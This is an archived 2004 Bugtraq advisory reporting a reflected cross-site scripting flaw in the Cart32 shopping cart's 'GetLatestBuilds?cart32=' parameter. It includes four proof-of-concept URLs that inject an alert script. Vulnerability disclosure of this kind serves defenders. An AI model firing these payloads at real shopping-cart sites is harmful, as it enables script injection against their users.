lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 04 Jul 2004 01:35:19 +0800
From: "Dr Ponidi" <drponidi@...kermail.com>
To: bugtraq@...urityfocus.com
Subject: Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits
    Remote Cross-Site Scripting Attacks


Indonesia Security Development Team Advisory

Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits
Remote Cross-Site Scripting Attacks 
======================================================================================================


     Advisory Name: Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits Remote Cross-Site Scripting Attacks 
          Release Date: 12:50 AM 6/28/04
            Application: Cart32 Shopping Cart 
		    Author: Dr`Ponidi <drponidi@...onesia.or.id>
	    Discover by: Dr`Ponidi <drponidi@...onesia.or.id>
 Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
         Vendor Status: The vendor has been contacted 
	     Vendor URL: http://www.cart32.com
		  Reference: http://drponidi.5u.com/advisory.htm
		  Greetz to: #indohack #dhegleng Sincan2[at]#malanghackerlink.net



Proof Of Concept:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>



[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops
intelligent, advanced application security assessment.  Based in
Indonesia, Indonesia Security Development Team offers the best of
breed security consulting services, specializing in shopping carts 
software and network security assessments.  We provide security 
information and patches for use by the entire network security
community.
 


This information is provided freely to all interested parties and may
be redistributed provided that it is not altered in any way, and that
the author is appropriately credited

Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory.htm
_______________________________________________________________
Dr`Ponidi <drponidi@...onesia.or.id>

Original document can be fount at http://drponidi.5u.com/advisory.htm


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ